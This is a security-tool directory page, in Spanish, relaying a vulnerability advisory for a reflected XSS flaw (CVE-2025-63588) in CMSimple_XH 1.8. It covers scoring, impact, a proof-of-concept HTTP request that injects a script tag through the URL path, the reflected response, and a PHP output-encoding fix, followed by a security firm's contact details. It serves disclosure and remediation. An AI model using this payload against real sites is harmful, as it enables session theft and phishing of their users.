Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-63588 — Prueba de concepto detallada para CVE-2025-63588, una vulnerabilidad de XSS reflejado en CMSimple_XH 1.8, con puntuación CVSS, análisis de impacto y un ejemplo de remediación de código seguro. | Kitploit
Herramientas/GitHubGitHub/cybercrewinc/cve-2025-63588
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

Prueba de concepto detallada para CVE-2025-63588, una vulnerabilidad de XSS reflejado en CMSimple_XH 1.8, con puntuación CVSS, análisis de impacto y un ejemplo de remediación de código seguro.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-63588 Cross-Site Scripting (XSS) Reflejado en el manejo de la ruta cmsimplexh de CMSimple_XH)

CVSS v3.1 Estimado: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medio) CVE Asignado: CVE-2025-63588
Productos: CMSimple_XH - 1.8 Vendor: CMSimple_XH - https://www.cmsimple-xh.org/

Resumen

Existe una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en el código de análisis del enrutador frontal de CMSimple_XH que maneja entradas dinámicas relacionadas con el inicio de sesión. La aplicación refleja datos controlados por el atacante tomados de la URI de la solicitud directamente en el HTML generado (por ejemplo, en atributos action de formularios y en hrefs de anclas) sin una codificación de salida adecuada. Un atacante puede crear una URL que, al ser visitada por una víctima, provoque la ejecución de JavaScript arbitrario en el navegador de la víctima en el contexto del sitio vulnerable.

Esto es un XSS reflejado (no persistente); la explotación requiere que una víctima siga un enlace manipulado. El proveedor ha sido informado y el problema ha sido documentado y se le ha asignado el CVE anterior.

Impacto

  • Ejecución de código del lado del cliente — se puede ejecutar JavaScript arbitrario en el contexto del sitio.
  • Divulgación de información — los scripts pueden leer el contenido del DOM y cualquier cookie o token accesible por el cliente. Si las cookies de sesión no tienen el atributo HttpOnly, los tokens de sesión pueden ser robados.
  • Secuestro de sesión / suplantación de identidad — la exfiltración de tokens podría permitir la toma de control de la cuenta dependiendo de los privilegios de la víctima.
  • Phishing / Suplantación de interfaz de usuario / Acciones forzadas — los scripts inyectados pueden crear una interfaz falsa, redirigir al usuario o enviar acciones bajo la sesión de la víctima.

Componente afectado

La vulnerabilidad se origina en el código del enrutador frontal / index.php (o controlador frontal equivalente) que analiza segmentos de ruta dinámicos y los asigna a variables de plantilla/página. Fragmentos de ruta sin procesar (el fragmento de estilo ?Templates... utilizado por el enrutador de CMSimple_XH) se pasan a las plantillas de página y se inyectan en atributos HTML sin una codificación o desinfección adecuada de atributos HTML, lo que permite que las etiquetas <script> inyectadas u otras cargas útiles se representen textualmente. Problemas similares de XSS reflejado se han publicado para otros componentes web y son comúnmente causados por una codificación de salida incorrecta de entradas no confiables.

Prueba de Concepto (PoC)

Esta PoC demuestra el reflejo de la entrada proporcionada por el atacante en el HTML devuelto que se ejecutará en el navegador de una víctima.

Solicitud:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Pasted image 20251006200014

Respuesta:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="https://github.com/cybercrewinc/cve-2025-63588/blob/main/cmsimplexh?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Pasted image 20251006200122

Cuando el navegador de una víctima renderiza esta página, el <script>alert(1)</script> inyectado se ejecuta. Pasted image 20251006204432 Pasted image 20251006204517

Ejemplo sugerido en PHP para generar un atributo action de forma segura:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

Créditos

Créditos

CVE Asignado:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Descubridor:株式会社CyberCrew / サイバークル

Referencias

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ お問い合わせ先

ご質問・ご相談などございましたら、お気軽にご連絡ください。


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 会社概要

項目内容
会社名株式会社CyberCrew
所在地東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 主なサービス

🛡️ セキュリティ診断・リスク評価

組織の脆弱性を多角的に分析し、最適な改善策を提案します。

💻 ペネトレーションテスト

標的型・シナリオ型・LLMペンテスト まで対応。

🌒 ダークウェブモニタリング

機密情報の流出を早期に検知し、迅速に対応。

🎯 REDチーム演習・ソーシャルエンジニアリング

実践的な攻撃シナリオに基づく防御力評価を実施。

🧠 セキュアシステム設計・コンサルティング

開発初期段階からセキュリティを考慮した設計を支援します。


🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — Your Trusted Security Partner.

Descargar herramienta